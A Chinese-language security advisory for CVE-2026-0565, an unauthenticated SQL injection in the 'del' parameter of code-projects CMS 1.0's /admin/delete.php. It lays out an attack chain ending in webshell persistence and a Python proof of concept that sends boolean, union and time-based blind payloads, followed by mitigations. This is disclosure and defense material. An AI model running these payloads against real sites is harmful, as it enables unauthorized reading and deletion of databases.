CVE-2026-0565 code-projects CMS 1.0 /admin/delete.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-0565

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Content Management System 1.0

漏洞概述

CVE-2026-0565是code-projects Content Management System 1.0版本中的一个高危SQL注入漏洞。该漏洞位于管理后台的删除功能文件/admin/delete.php中，由于对用户输入的del参数未进行充分的输入验证和SQL语句预编译处理，攻击者可以通过构造恶意的SQL语句片段实现SQL注入攻击。成功利用此漏洞的攻击者可以在不需要任何认证凭证的情况下远程执行SQL代码，从而非法访问、篡改或删除数据库中的敏感信息，包括用户账号、密码、配置文件等核心数据。由于该漏洞的利用复杂度较低且已有公开的漏洞利用代码，攻击者可以轻易地通过自动化工具发起大规模攻击，对使用该CMS系统的网站造成严重的数据安全威胁和业务中断风险。

技术细节

该SQL注入漏洞的根本原因在于/admin/delete.php文件中的数据库查询语句直接拼接了用户可控的del参数，而未采用参数化查询或预编译语句。攻击者可以通过HTTP请求向该文件发送精心构造的SQL载荷，利用UNION SELECT、布尔盲注、时间盲注等SQL注入技术获取数据库敏感信息。在正常情况下，删除功能的典型SQL查询可能类似于：DELETE FROM table_name WHERE id='用户输入'。攻击者可以通过构造类似del=1' OR '1'='1的payload实现无条件删除，或使用del=1 UNION SELECT 1,2,3,4--等payload进行联合查询注入。由于该CMS系统可能使用默认配置且未启用Web应用防火墙防护，攻击者可以直接绕过基本的安全过滤机制。此外，由于漏洞位于管理后台路径，理论上任何能够访问该路径的用户都可能发起攻击，且无需任何身份验证。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者通过搜索引擎或扫描工具发现使用code-projects CMS 1.0的目标网站，并确认/admin/delete.php端点可访问

STEP 2

步骤2: 漏洞探测

攻击者使用自动化工具向/admin/delete.php发送带有SQL注入payload的HTTP POST请求，测试del参数是否存在SQL注入漏洞

STEP 3

步骤3: 注入验证

通过观察响应差异（如错误信息、响应时间、页面内容变化）确认漏洞存在，常用技术包括布尔盲注、时间盲注或联合查询

STEP 4

步骤4: 数据提取

利用确认的注入方式逐步提取数据库结构、表名、字段名及敏感数据（如用户账号、密码哈希等）

STEP 5

步骤5: 权限提升与持久化

根据获取的凭据尝试登录管理后台，或通过写入webshell实现服务器持久化控制，最终完全接管目标系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-0565 PoC - SQL Injection in /admin/delete.php
# Target: code-projects Content Management System 1.0
# Vulnerability: SQL Injection via 'del' parameter

target_url = "http://target.com/admin/delete.php"

# Basic SQL injection test - Boolean based
payloads = [
    "1' OR '1'='1",  # Basic injection
    "1' UNION SELECT 1,2,3,4--",  # Union-based injection
    "1' AND 1=1--",  # Boolean true condition
    "1' AND 1=2--",  # Boolean false condition
]

def test_sql_injection(url, param='del'):
    print(f"[*] Testing SQL Injection on {url}")
    
    for payload in payloads:
        data = {param: payload}
        try:
            response = requests.post(url, data=data, timeout=10)
            print(f"[+] Payload: {payload}")
            print(f"    Status: {response.status_code}")
            print(f"    Length: {len(response.text)}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error with payload {payload}: {e}")

def extract_database_info(url):
    # Time-based blind SQL injection for data extraction
    # Example: Extract database version
    time_payload = "1' AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--"
    data = {'del': time_payload}
    
    print(f"[*] Extracting database information...")
    print(f"[*] Payload: {time_payload}")
    
    try:
        response = requests.post(url, data=data, timeout=15)
        print(f"[+] Response received")
    except requests.exceptions.Timeout:
        print(f"[+] Time-based injection confirmed - database version likely 5.x")

if __name__ == "__main__":
    test_sql_injection(target_url)
    extract_database_info(target_url)

影响范围

code-projects Content Management System 1.0

防御指南

临时缓解措施

在生产环境中，可通过临时禁用/admin/delete.php文件或对该路径实施访问控制（如IP白名单）来缓解风险；同时建议在Web应用层部署WAF并更新SQL注入检测规则，对包含UNION、SELECT、SLEEP等SQL关键字的请求进行拦截；此外，对数据库账户权限进行限制，确保即使存在注入也无法执行高危操作。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0565
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0565
3 Details https://www.cvedetails.com/cve/CVE-2026-0565/
4 VulDB https://vuldb.com/cve/CVE-2026-0565
5 Link https://code-projects.org/
6 Link https://github.com/Limingqian123/CVE/issues/12
7 Link https://vuldb.com/?ctiid.339377
8 Link https://vuldb.com/?id.339377
9 Link https://vuldb.com/?submit.729227
10 Link https://github.com/Limingqian123/CVE/issues/12